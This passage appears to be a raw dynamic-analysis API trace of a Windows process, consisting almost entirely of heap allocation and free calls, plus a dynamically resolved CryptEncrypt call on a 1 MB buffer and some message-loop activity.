Size=0xd) returned 0x2e50a28 [0167.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0167.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.280] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0167.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0167.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0167.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54170 [0167.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0167.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0167.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0167.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0167.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0167.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0167.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0167.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0167.281] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0167.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0167.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0167.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0167.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0167.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0167.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0167.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0167.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0167.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0167.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0167.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0167.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0167.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0167.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0167.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0167.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0167.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0167.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0167.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0167.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0167.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0167.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0167.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0167.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0167.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0167.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0167.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0167.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0167.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0167.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0167.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0167.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0167.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0167.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0167.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0167.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0167.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0167.299] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0167.299] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0167.299] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0167.299] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0167.299] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0167.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0167.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0167.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0167.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0167.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0167.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0167.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0167.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0167.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0167.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0167.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0167.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0167.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0167.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0167.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0167.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0167.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0167.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0167.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0167.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0167.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0167.301] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0167.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0167.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0167.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0167.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0167.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0167.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0167.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0167.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4110020 [0167.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0167.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0167.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0167.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0167.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0167.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0167.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0167.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0167.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0167.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4221020 [0167.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0167.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0167.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x433e020 [0167.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0167.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0167.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0167.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0167.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0167.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0167.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4221020 | out: hHeap=0x970000) returned 1 [0167.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0167.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0167.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0167.952] HeapFree (in: hHeap=0x970000, 